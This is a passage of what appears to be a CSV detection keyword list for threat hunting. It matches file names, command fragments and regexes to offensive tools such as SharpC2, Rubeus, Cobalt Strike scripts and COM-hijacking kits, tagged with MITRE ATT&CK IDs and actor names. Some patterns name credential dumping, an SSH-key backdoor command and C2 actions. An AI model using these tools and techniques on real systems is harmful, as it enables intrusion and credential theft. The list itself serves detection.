TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*--collectionmethod DCOnly*",".{0,1000}\-\-collectionmethod\sDCOnly.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*COM Object hijacking persistence.ps1*",".{0,1000}COM\sObject\shijacking\spersistence\.ps1.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and 
MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","1","N/A","8","1","55","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z" "*com.itgorillaz.lnk2pwn.model*",".{0,1000}com\.itgorillaz\.lnk2pwn\.model.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*com.rastamouse.*",".{0,1000}com\.rastamouse\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*com_exec_go(*",".{0,1000}com_exec_go\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","0","N/A","10","10","306","84","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" "*combine_harvester-main*",".{0,1000}combine_harvester\-main.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","106","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*com-exec.cna*",".{0,1000}com\-exec\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","306","84","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" "*COMHunter* -inproc*",".{0,1000}COMHunter.{0,1000}\s\-inproc.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - 
TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*COMHunter* -localserver*",".{0,1000}COMHunter.{0,1000}\s\-localserver.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*COMHunter.csproj*",".{0,1000}COMHunter\.csproj.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*COMHunter.exe*",".{0,1000}COMHunter\.exe.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*COMHunter.sln*",".{0,1000}COMHunter\.sln.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*COM-Hunter_v*.zip*",".{0,1000}COM\-Hunter_v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in 
C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*COM-Hunter-main*",".{0,1000}COM\-Hunter\-main.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*COMInjectDotNet.exe*",".{0,1000}COMInjectDotNet\.exe.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*-Command ""--signature --driver""*",".{0,1000}\-Command\s\""\-\-signature\s\-\-driver\"".{0,1000}","offensive_tool_keyword","PowerSharpPack","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*-command *.exe* -technique ccmstp*",".{0,1000}\-command\s.{0,1000}\.exe.{0,1000}\s\-technique\sccmstp.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*command_obfuscator.py*",".{0,1000}command_obfuscator\.py.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1504","175","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*command=*###---POWERSHELL---*eval $(echo *",".{0,1000}command\=.{0,1000}\#\#\#\-\-\-POWERSHELL\-\-\-.{0,1000}eval\s\$\(echo\s.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" "*CommandAndControl_*.py*",".{0,1000}CommandAndControl_.{0,1000}\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CommandCam.exe /devlist > *\CC.log*",".{0,1000}CommandCam\.exe\s\/devlist\s\>\s.{0,1000}\\CC\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" 
"*CommandCam.exe*",".{0,1000}CommandCam\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*commandovm.*.installer.fireeye*",".{0,1000}commandovm\..{0,1000}\.installer\.fireeye.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*commando-vm-master*",".{0,1000}commando\-vm\-master.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*Commands/Brute.*",".{0,1000}Commands\/Brute\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Commands/Createnetonly.*",".{0,1000}Commands\/Createnetonly\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Commands/DcomCommand.*",".{0,1000}Commands\/DcomCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/DroneCommand.*",".{0,1000}Commands\/DroneCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/ExecuteAssembly.*",".{0,1000}Commands\/ExecuteAssembly\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 
- T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/KillProcess.*",".{0,1000}Commands\/KillProcess\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/ListProcesses.*",".{0,1000}Commands\/ListProcesses\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/Logonsession.*",".{0,1000}Commands\/Logonsession\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Commands/PowerShellImport.*",".{0,1000}Commands\/PowerShellImport\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/Preauthscan.*",".{0,1000}Commands\/Preauthscan\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Commands/PrintWorkingDirectory.*",".{0,1000}Commands\/PrintWorkingDirectory\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/PsExecCommand.*",".{0,1000}Commands\/PsExecCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/RevToSelf.*",".{0,1000}Commands\/RevToSelf\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/RunPe.*",".{0,1000}Commands\/RunPe\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/SetSleep.*",".{0,1000}Commands\/SetSleep\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework 
written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/Shell.*",".{0,1000}Commands\/Shell\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/ShInject.*",".{0,1000}Commands\/ShInject\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/ShSpawn.*",".{0,1000}Commands\/ShSpawn\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/Silver.*",".{0,1000}Commands\/Silver\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*Commands/StealToken.*",".{0,1000}Commands\/StealToken\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/StopDrone.*",".{0,1000}Commands\/StopDrone\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/TakeScreenshot.*",".{0,1000}Commands\/TakeScreenshot\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/WhoAmI.*",".{0,1000}Commands\/WhoAmI\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/WinRmCommand.*",".{0,1000}Commands\/WinRmCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in 
C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/WmiCommand.*",".{0,1000}Commands\/WmiCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*commixproject/commix*",".{0,1000}commixproject\/commix.{0,1000}","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4340","797","2024-04-29T06:05:52Z","2015-03-20T08:38:26Z" "*common.ReflectiveDLL*",".{0,1000}common\.ReflectiveDLL.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*common.ReflectiveDLL*",".{0,1000}common\.ReflectiveDLL.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","107","25","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*common_passwords.txt*",".{0,1000}common_passwords\.txt.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" 
"*commonspeak_sublist.txt*",".{0,1000}commonspeak_sublist\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*communicate_as_backdoor_user.py*",".{0,1000}communicate_as_backdoor_user\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*comnap_##*",".{0,1000}comnap_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass 
